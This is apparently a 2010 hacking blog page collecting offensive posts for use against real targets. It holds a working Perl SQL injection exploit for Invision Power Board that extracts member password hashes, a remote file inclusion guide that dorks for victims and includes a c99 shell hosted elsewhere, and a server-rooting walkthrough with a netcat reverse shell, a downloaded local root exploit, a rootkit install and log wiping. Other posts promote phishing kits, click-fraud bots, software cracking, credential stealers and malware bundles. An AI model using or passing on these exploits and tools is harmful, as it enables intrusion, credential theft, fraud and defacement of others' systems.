2010 | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

How to crack IIS FTP password using Brute-Force



FTP is an application or service or protocol  which can be used to transfer files from one place to another  place ,it really comes very handy  during transfer of files from a local box to a remote one .Suppose someone get access to your FTP then he/she can cause nightmare for you by uploading  unappropriate images or files etc.Here we will discuss how we can crack the password of IIS installed FTP service in Windows.

What is Brute-Force?

Brute-force is a type of attack in which every  possible combination of letters, digits and special characters are  tried until the right password is matched  with the username. The main limitation of this attack is its time factor. The time it takes to find the proper match mainly depends on the length and complexity of the password.Here I will be using this attack to crack the password.So,lets start….
Requirements:
  1. The tool we will be using  ” BrutusA2”(Download: http://www.hoobie.net/brutus/)
  2. You need to know the target suppose “ftp://123.123.xx.xxx”

Procedure:

Step 1.Here I have shown an authentication page of an FTP service in the image below and in the following steps we will crack its password using brutus.

Step 2.Now open up “Brutus” and type  your desire target ,select wordlist and select “FTP” from the drop down menu  and click start. If you are confused then follow the image below.


Step 3.The time it takes as I mentioned above depends on the complexity and length of the password.So after clicking the start button wait for the time as mentioned in the tool.The password will be displayed as shown above.
Recommendation: I would recommend the readers to try it in a virtual environment as I did and enjoy the trick.It is not advisable to try it on some unknown user without prior permission.


Read More Add your Comment 1 comments


Hash Cracking tutorial with HashCat



http://www.ziddu.com/download/11316975/hashcat-gui-0.2.433.rar.html
HashCat is a tool for cracking various types of hash. This tool can do more than one Hash cracking, which means we can put some hashes into a file.txt and it crack the hashes simultaneously. we can do offline cracking hashes (it means we don`t need an Internet connection that uses the hash databases that have been cracked before).

the hash algorithm supported by this tool include:
* MD5
* Md5 ($ pass. $ Salt)
* Md5 ($ salt. $ Pass)
* Md5 (md5 ($ pass))
* Md5 (md5 (md5 ($ pass)))
* Md5 (md5 ($ pass). $ Salt)
* Md5 (md5 ($ salt). $ Pass)
* Md5 ($ salt.md5 ($ pass))
* Md5 ($ salt. $ Pass. $ Salt)
* Md5 (md5 ($ salt). Md5 ($ pass))
* Md5 (md5 ($ pass). Md5 ($ salt))
* Md5 ($ salt.md5 ($ salt. $ Pass))
* Md5 ($ salt.md5 ($ pass. $ Salt))
* Md5 ($ username.0. $ Pass)
* Md5 (strtoupper (md5 ($ pass)))
* SHA1
* Sha1 ($ pass. $ Salt)
* Sha1 ($ salt. $ Pass)
* Sha1 (sha1 ($ pass))
* Sha1 (sha1 (sha1 ($ pass)))
* Sha1 (strtolower ($ username). $ Pass)
* MySQL
* MySQL4.1/MySQL5
* MD5 (WordPress)
* MD5 (PHPbb3)
* MD5 (Unix)
* SHA-1 (Base64)
* SSHA-1 (Base64)
* SHA-1 (Django)
* MD4
* NTLM
* Domain Cached credentials
* MD5 (CHAP)
* MSSQL

Attack Mode supported in this tool:
* Straight *
* Combination *
* Toggle-Case *
* Brute-Force
* Permutation

First, create a file with notepad:
[1] C:\temp\hash.txt and
[2] C:\ temp\results.txt ago
open the C:\ temp\hash.txt and fill with Hash you want to crack. picture as below:
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
For C:\temp\results.txt , do nothing and let it blank because the cracked hashes will be saved in here.

Run Hashcrack. and follow the steps below:

In this tutorial, the author uses brute-force mode, cracking technique with a combination of characters. Notice the image below:
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

[-] In Hashfile column, click the folder icon (browse for hashfile) and open the C: \ temp \ hash.txt that you have previously made.
[-] In Brute force column, select mode and select the type of hash (we are trying to crack MD5 here)
[-] In the Password length, insert 1-14 (u may put about 20 oto 30) the longer the password length, the longer the cracking process.
[-] In bruteforce charset settings, you can fill with the desired character. eg abcdefghijklmnopqrstuvwxy z1234567890 or abcdefghijklmnopqrstuvwxy z1234567890 !@#$%^&*()_+
[-] In OUTFILE column, put a tick and specify the path in C:\temp\results.txt that you have previously made.
[-] Checklist OUTFILE Monitor and click I want to catch a Hash ..

Wait for the process of cracking (this tool directly run a CLI mode)
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

you will find the results of the hash that has been successful on crack.
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm


Read More Add your Comment 3 comments


adf.ly Mass Auto-clicking Bot v3.3



DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

This is a Mass clicking bot which uses proxies to click your adf.ly links for you.


--Instructions--
1. Run iView Fur U v3.exe
2. Load a list of mostly USA proxies in the form IP:Port or import from a .txt
3. Input your adf.ly link. (Remember to add the http://www part!)
3. Set the delay to 9 to 16 seconds to avoid ban.
4. Start the program.

DOWNLOAD LINK


Virus Total report
http://www.virustotal.com/file-scan/...827-1290158321


Read More Add your Comment 5 comments


Social Ninja is a Social Engineering tool



Now, the author has made an updated version available for us – Social Engineering Ninja version 0.3.



“S-E Ninja is a Social Engineering tool, with 20-25 popular sites fake pages and anonymous mailer via mail() function in PHP. It is a Phishing Web Application Written in PHP,XHTML,CSS,JS.”
This is the official change log:
  • This version is coded from the zero.
  • Fixed broken Phishing pages
  • Added more modules
  • Fixed Login Bug
  • New interface
  • Now you can upload your files
  • New POST.php design
  • Added tabnabbing module
  • Added one IE exploit
  • Added Cpanel Phishing Page
  • Added The Phishing Date
  • New Mailer you can send to alot of mail in same time
  • Added JavaScript packer to bypass AV
  • 3 tricks for tabnabbing
  • A lot of bugs and issues fixed
  • Fixed a lot of interface issues
  • You can upload attachments
  • New logo image
  • Added date to victims
So, this version is coded from the ground up and with a lot of bug fixes.
Download Social-Engineering Ninja V0.3 (SEN-V0.3.rar)here


Read More Add your Comment 0 comments


RAR Password Cracker



This is very effective program, which can easily to crack RAR/WinRAR password, it use a dictionary and a brute force attack

RAR Password Cracker download
Website http://www.rarpasswordcracker.com/
Download Page http://www.rarpasswordcracker.com/rpc412_setup.exe
File size 205 Kb
License Freeware


Read More Add your Comment 0 comments


Date Cracker 2000



Data Cracker 2000 is an application which can easily remove the date protection(i.e. trail protection) from many software. It is very useful for shareware or trial versions of software which expire after a specific date. When you crack the software with Date Cracker 2000, the software will always show something like “There are 90 days remaining in your trial period” and the software will actually last forever :). Some programs have good protection and it isn’t possible to remove their date protection .


Date Cracker 2000 download
Website http://www.e-tech.ca/003-dc2000.asp
Download Page http://www.wonderworks.ca/nbia/dc20000.zip
File size 1.5 MB
Video Tutorial http://www.wonderworks.ca/nbia/dc2000.wmv


Read More Add your Comment 0 comments


Downloading from ShitCash - without filling any thing!





THIS IS NOT A BYPASS, BUT DOES THE JOB JUST LIKE ONE
This has a pretty good succeeding rate.





REQUIREMENTS:
- FireFox
- GreaseMonkey
- This script: http://adf.ly/3fLH <--- THIS DOES NOT REDIRECT TO SHITCASH OR ANY OTHER DOWNLOADING SITE!




So it works pretty easy, actually.

1. You just open your ShitCash page.

2. Choose an offer.

3. Press Ctrl + Shift + F and its all filled in with random stuff.
*IN SOME CASES TURN OF GREASEMONKEY BY CLICKING THE LITTLE MONKEY, IF SUBMITTED TURN ON AGAIN*

4. Now, submit the form, and your download unlocks most of the time.

Optional 5. If doesn't, clean your cookies, I recommend using this add-on:
https://addons.mozilla.org/nl/firefox/addon/3100/
and start at step 1.




Need a link to test it on?
Use this one:
http://adf.ly/6Zos

By  Maasie


Read More Add your Comment 0 comments


Install And Setting PsyBNC On Unix Shell



What is psyBNC?
psyBNC is an IRC network bouncer (BNC). psyBNC is short form of psychoid bouncer (BNC).
psyBNC is mostely used to hide your ip on IRC network and bounce your ISP. It is very easy to use and due to its unique features, it has become most popular BNC (specially on FREEBSD) .
psyBNC does not just bounce your ISP (hide your ip) it also stays connected to IRC server even after you close your irc client. Most of the users like this feature which made psyBNC most popular among bouncers.
Moreover there is multiple user feature included with psyBNC, multiple server support and much more. It also support IPV6.
Here I am going to let you know how to setup psyBNC on your shell in few easy steps.
How to setup (compile/install) bnc.
1.) type: wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz
Above command will download psybnc in your shell.
2.) type: tar -zxvf psyBNC-2.3.2-7.tar.gz
Above command will untar your downloaded psyBNC tar file. Now you have to change dir to psybnc so type command given below.
3.) type: cd psybnc
Now you are in directory called psyBNC-2.3.2-7
4.) type: make
Your psybnc is almost compiled now. After performing this command you will be asked some questions as below
Country Name [DE]:
State/Province [Somewhere]:
Locality Name (eg, city) []:
Organization Name (eg, company) [tCl]:
Organizational Unit Name (eg, section) [psyBNC]:
Common Name (Full domain of your server) []:
LEAVE all field blank if you dont want to answer.
Now you will have to edit psybnc.conf file to edit listening port.
5.) type: pico psybnc.conf
There you will see 3 lines in your psybnc.conf file. You just have to edit “PSYBNC.SYSTEM.PORT1=31337?. 31337 is default listening port. Change it to your choice of listening port.
I prefer you to chose any port between 10000 – 20000.
example: PSYBNC.SYSTEM.PORT1=15678
6.) type: ctrl (key)+x
(to save your psybnc.conf file)
7.) type: y + enter (key)
8.) type: ./psybnc psybnc.conf
Now you are ready to use your psyBNC
Kindle Wireless Reading Device, Wi-Fi, 6" Display, Graphite - Latest Generation


Read More Add your Comment 1 comments


The Hack-Counter Hack Training Course






The Hack-Counter Hack Training Course | English | RS | HF | ULD | 999MB

* Combination of talking-head video, slideshow presentation and video capture of actual screen shots
* Walks through setting up "lab" environment and then experimenting with tools on lab PC's
* Includes suite of hacker / security tools for both Windows and Linux platforms on CD
* Requires RealOne Player (freely available) because video presentation is in RealVideo format
* Good program to use in combination with Ed Skoudis' book: Counter Hack
* Mainly for beginners but may even provide some new tricks to seasoned gurus

CD1 Content
Session 1
# Understand the Purpose of the Course and the Phases of Hacking
# Acquire the Hardware and Software for Your Laboratory
# Build the Windows® 2000/XP Hacker Tool Analysis Laboratory
# Build the Linux Hacker Tool Analysis Laboratory
# Test Your Laboratory and Keep It Secure

Session 2
# Understand Low-Tech and Computer-Based Reconnaissance
# Use Sam Spade to Gather Information About Target
# Search the Web for Interesting Target Information

Session 3
# Understand Scanning Techniques
# Search for Modems Using THC-Scan
# Develop a Network Map Using Cheops-ng
# Conduct a Port Scan Using Nmap
# Scan for Vulnerabilities Using Nessus

CD2 Content
Session 4
# Analyze Buffer Overflows
# Passwords on Windows® and Linux
# Sniff Data from the Network Using Sniffit
# Use Netcat, the Swiss Army Knife™ of Hacker Tools

Session 5
# Analyze an Application-Level Trojan Horse Backdoor (VNC)
# Analyze a Traditional RootKit (LRK4)
# Analyze a Kernel-Level RootKit (Kernel Intrusion System)

Session 6
# Understand File Hiding in Windows®
# Understand File Hiding in UNIX
# Analyze Protocol Tunneling Using Reverse WWW Shell
# Analyze Covert Channels Using Covert_TCP



Download HotFile:
http://hotfile.com/dl/30681801/c9fcb36/Hack_Training_Video_Course_CD1.part1.rar.html
http://hotfile.com/dl/30681797/d5e1308/Hack_Training_Video_Course_CD1.part2.rar.html
http://hotfile.com/dl/30681886/749794e/Hack_Training_Video_Course_CD1.part3.rar.html
http://hotfile.com/dl/30681922/eb4db58/Hack_Training_Video_Course_CD1.part4.rar.html
http://hotfile.com/dl/30681925/56c9598/Hack_Training_Video_Course_CD1.part5.rar.html
http://hotfile.com/dl/30681926/c779bb9/Hack_Training_Video_Course_CD2.part1.rar.html
http://hotfile.com/dl/30681927/641f59a/Hack_Training_Video_Course_CD2.part2.rar.html
http://hotfile.com/dl/30681929/4a846b2/Hack_Training_Video_Course_CD2.part3.rar.html
http://hotfile.com/dl/30681931/22d7125/Hack_Training_Video_Course_CD2.part4.rar.html
http://hotfile.com/dl/30681935/6bc0a6c/Hack_Training_Video_Course_CD2.part5.rar.html

Download Sharingmatrix:
http://sharingmatrix.com/file/1996263/Hack Training Video Course CD1.part1.rar
http://sharingmatrix.com/file/1996255/Hack Training Video Course CD1.part2.rar
http://sharingmatrix.com/file/1996335/Hack Training Video Course CD1.part3.rar
http://sharingmatrix.com/file/1996345/Hack Training Video Course CD1.part4.rar
http://sharingmatrix.com/file/1996337/Hack Training Video Course CD1.part5.rar
http://sharingmatrix.com/file/1996383/Hack Training Video Course CD2.part1.rar
http://sharingmatrix.com/file/1996385/Hack Training Video Course CD2.part2.rar
http://sharingmatrix.com/file/1996389/Hack Training Video Course CD2.part3.rar
http://sharingmatrix.com/file/1996391/Hack Training Video Course CD2.part4.rar
http://sharingmatrix.com/file/1996387/Hack Training Video Course CD2.part5.rar

Download Uploading:
http://uploading.com/files/f6773cf1/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part1.rar/
http://uploading.com/files/ec19fem3/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part2.rar/
http://uploading.com/files/2647f23c/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part3.rar/
http://uploading.com/files/3mcmm1b4/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part4.rar/
http://uploading.com/files/48bm6faf/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part5.rar/
http://uploading.com/files/fm216f43/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part1.rar/
http://uploading.com/files/cma4d258/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part2.rar/
http://uploading.com/files/c77429c7/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part3.rar/
http://uploading.com/files/14575adf/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part4.rar/
http://uploading.com/files/bd554e37/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part5.rar/

Download Rapidshare:
http://rapidshare.com/files/357416955/Hack_Training_Video_Course_CD1.part1.rar.html
http://rapidshare.com/files/357416872/Hack_Training_Video_Course_CD1.part2.rar.html
http://rapidshare.com/files/357417783/Hack_Training_Video_Course_CD1.part3.rar.html
http://rapidshare.com/files/357417977/Hack_Training_Video_Course_CD1.part4.rar.html
http://rapidshare.com/files/357418131/Hack_Training_Video_Course_CD1.part5.rar.html
http://rapidshare.com/files/357418360/Hack_Training_Video_Course_CD2.part1.rar.html
http://rapidshare.com/files/357418252/Hack_Training_Video_Course_CD2.part2.rar.html
http://rapidshare.com/files/357418247/Hack_Training_Video_Course_CD2.part3.rar.html
http://rapidshare.com/files/357418298/Hack_Training_Video_Course_CD2.part4.rar.html
http://rapidshare.com/files/357418267/Hack_Training_Video_Course_CD2.part5.rar.html
Regards,
Adnan Anjum From http://hackguide4u.blogspot.com


Read More Add your Comment 2 comments


Tutorials



Courses

All Computer Courses
Ms Office
Adobe Photoshop
Adobe Flash
Corel Draw
Inpage Urdu
Adobe Premier
Adobe PageMaker
BlueVoda
Dreamviewer

All Courses Here in Zip and Document and Notes Formats

Watch Tips Tricks Here


Adobe Flash Course and Contents Download Here

Networking

Programming

PHP Urdu Tutorial



Read More Add your Comment 2 comments


Invision Power Board SQL injection exploit by RST/GHC



#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (&lt2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~]    SERVER : blah.com
## [~]      PATH : /ipb13/
## [~] MEMBER ID : 1
## [~]    TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com  /ipb202/ 1 1
## [~]    SERVER : blah.com
## [~]      PATH : /ipb202/
## [~] MEMBER ID : 1
## [~]    TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV &lt 4) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~]    SERVER : $server\r\n";
print "[~]      PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~]    TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
 {
 if(length($allchar) &gt 0){
 print qq{\b\b DONE ]

 MEMBER ID : $member_id
 };
 print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
 print $allchar."\r\n";
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit();
 }
else
 {
  $allchar .= chr(42);
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)&lt5) { $i=crack($fmin,$fmax); return $i; }

 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }

sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i&lt$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }

sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0];
 $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
 $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
 $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
 $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
 $nmalykh    = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
 $socket = IO::Socket::INET-&gtnew( Proto =&gt "tcp", PeerAddr =&gt "$server", PeerPort =&gt "80");

 printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
 $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

 while(&lt$socket&gt)
  {
  if (/Set-Cookie: session_id=0;/) { return 1; }
  }

 return 0;
 }

sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub usage()
 {
 print q(
 Invision Power Board v &lt 2.0.4 SQL injection exploit
 ----------------------------------------------------
 USAGE:
 ~~~~~~
 r57ipb2.pl [server] [/folder/] [member_id] [target]

 [server]    - host where IPB installed
 [/folder/]  - folder where IPB installed
 [member_id] - user id for brute

 targets:
          0 - IPB 1.*
          1 - IPB 2.* (Prior To 2.0.4)

 e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
 ----------------------------------------------------
 (c)oded by 1dt.w0lf
 RST/GHC , http://rst.void.ru , http://ghc.ru
 );
 exit();
 }




Read More Add your Comment 0 comments


2007-2008-2009-2010-2011 local r00t exploit Click Download !




Read More Add your Comment 1 comments


All Good shells which hard to find




Read More Add your Comment 2 comments


Hack some facebook apps (apps.facebook.com vulnerable to SQL and html Injection )



 From Adnan Anjum Founder Of http://hackguide4u.blogspot.com
This is very strange think facebook have sql vulnerability





 Some info for all of you injector team broke facebook code
Special Thanks To TeAM inj3ct0r
Part 1 Original: http://inj3ct0r.com/exploits/11638
Part 2 Original: http://inj3ct0r.com/exploits/13403 


Read More Add your Comment 1 comments


How to hack websites using Remote file inlcusion



 By Adnan Anjum
I receive many E-mails on How To Hack websites so,
 today I will demonstrate how hackers use remote file inlcusion to deface websites.

Requirements
C99 shell


First of all visit google and type

"index.php?page="

This will show all the pages which have index.php?page=" in their url, RFI vulnerabilities only work on those sites which have index.php?page= in their url.


Now lets say that the website is as follows:


www.targetsite.com/index.php?page=something


so to check the vulnerability we will replace the something to
Google or any other site now if Google homepage shows up this means that the website is vulnerable to the attack.The url will look like


                                                       
www.targetsite.com/index.php?page=www.google.com



Once we know that the website is vulnerable to the attack we will now include the c99 shell.To do it download the c99 shell and then upload it to a webhosting site such as Welcome to Ripway.com - free file hosting, free music hosting, direct linking or Most Endorsed FREE Website Hosting Provider | Free Web Hosting


Once the shell is uploaded you will have a unique url for your shell lets say it is


www.webhostingsite.com/c99.txt


Now to execute the shell in order to gain access to the website we will do as follows


http://www.targetsite.com/index.php?...e.com/c99.txt?


Dont forgett the "?" or else it wont be executed.


Remeber this does not work on all websites so the key is to try and try and try and try! 

regards,
Adnan Anjum


Read More Add your Comment 3 comments


R.F.I. / Server Rooting Complete Tutorial



R.F.I. / Server Rooting Complete Tutorial 

By Adnan Anjum

================================================== =====================
R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

================================================== =====================

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57, or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)
------------------------------------------------------------------------------
The purpose of this tutorial is to give a very general picture in process of Rooting
a Linux Server with Safe Mod: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

We can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/ind.../yourshell.txt

The "yourshell.txt" will be your remote shell.. The reason why we add a "?" at the end of the ".txt" is so the server will read it as a PHP File.. and not a normal text file.

After we enter in the shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (My IP is 94.228.220.186 - Quick and Easy way to SEE my IP address - CmyIP.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: .:[ packet storm ]:. - http://packetstormsecurity.org/ | arblan.com - arb lan Resources and Information.
or try Googlin' you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:
wget arblan.com - arb lan Resources and Information.

where arblan.com - arb lan Resources and Information. is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

Congratulations, You've got root!

/end.
Only For Educational Purposes I AM NOT RESPONSIBLE FOR IT,S MISUSE
Enjoy !


Read More Add your Comment 2 comments


400 Viruses In 1 File



400 Viruses In 1 File  
By Adnan Anjum

Avispa.dr
Dark Avenger
AVA.550
Univ/a
Auspar.377
Auspar.338
OC/oops
Middle
Auspar.635
Aus-Term.mp.3490
Jeru.1413
OC/scud
Auspar.dr
Auspar.635
Auspar.615
Auspar
Aust.543
Auspar.424
Auspar.377
Auspar.338
Auspar.292a
Auspar.215
Auspar.187
Auspar
Univ/b
Aurea.653
Iron-Maiden
Akuku.1111
Akuku.889
Akuku.886
NRLG.b
Attitude
Attention.394
HLL.ow.4505
Attention.394.dam
Xany
Univ/g
Univ/q
Univ.cmp
OC/vcl
Atomant.2143
AT
Atomic.350
Astra.1010
Suriv.dr
Comasp
Shocker.cmp.7000
Tiebud
BtDr.b
Ash.743
Univ/r
Armagedon.y
Armagedon
Vienna
ARCV.Scy.1208
ARCV.Scroll.795ARCV.Scroll.dr)
ARCV.Sand.1172
ARCV.More
ARCV.Kiss
ARCV.Jo.986
ARCV.Jo.912a
ARCV.250.dr
ARCV.642
ARCV.639a
ARCV.1183.dr
ARCV.Anna.742.dr
ARCV.639a
ARCV.Jo.916
ARCV.839
ARCV.Slime.773
ARCV.Ice
ARCV.Ice
Univ/q
ARCV.330a
ARCV.255
Crew.2480
Univ/o
7thSon.426
Arara.dr
Arara.1054
Arab.834
Armagedon.y
QScreen3
Suriv.1488
Suriv.dr
Dark Avenger.2000
Jerusalem.cr
Jerusalem.cr
APLittle.153
APLittle.150
APLittle.147
APLittle.142a
APLittle.118a
APLittle.153
Univ.topsy
Anti-Pascal
Tiny-GM.129
Jerusalem
BtDr.Unk2
Jeru.1605
AntiMIT
Antiexe
Murphy
Thanksgiving.mp.1253a
Anticad.3012a
Anticad.mp.4096.d
Anticad.2900
Anticad.mp.4096.a
Anticad.2646
Anthrax.mp.1024
Univ.ow/d
Vacsina.1206
ARCV.Anna.742.dr
HLLP.Animus
Andromeda
Jerusalem.ch
Jeru.1808.a
QZap141
Pixel.845
Pixel.k
Ambulance
AlphaStrike.2000
Alien.733.a
Alia.1023
YD.1049.a
Alex.1951
Brain
Albania
Alabama.1560.a
Akuku.886
Tiebud
BtDr.Aircop
BtDr.b
HLL.ow
HLL.cmp.8064
AHADisk
Agiplan
YDOC/vcl
Syslock.dropped
NRLG.b
V2P6.1993
Dead
BitAddict
ARCV.Scroll.795
ARCV.Scroll.dr
Acid.dr
and alot more


Code:
 .........................................


Read More Add your Comment 1 comments


[Ultimate Pack] Bruter, Binder, Keylogger, Proxies









Code:
2 Binder
+5 Bruter
+10 DDoser
+20 Fake Programs
a 36 Gigabyte PW-List
+1 000 000 Proxies
+20 Key logger
+5 Virus Builders
a nice song 4 stones 
A nice Port Scanner
A nice PW-Stealer
+5 Rat's[ NEW]




Read More Add your Comment 1 comments


ISR Stealer 0.3








Just one small update, added mail p***words revealer because one friend ask me to.
+Fixed some bugs

Last update date: 07/08/2010

Current Options:
+Send logs to my sql data ****(php)
+Bind one file(any extension)
+Change server icon
+Pack server with upx
+Steal options:
Internet Explorer 4/5/6/7/8
Mozilla Firefox 3.x.x
Google Chrome
Opera 8/9/10
Yahoo Messenger 8/9/10 P***word
Yahoo ETS
Msn Messenger
Pidgin
Windows Cd key
Filezilla
No-ip
DynDns
+Mail p***words:
Outlook Express
Microsoft Outlook 2000
Microsoft Outlook 2002/2003/2007/2010
Windows Mail
Windows Live Mail
IncrediMail
Eudora
Netscape 6.x/7.x
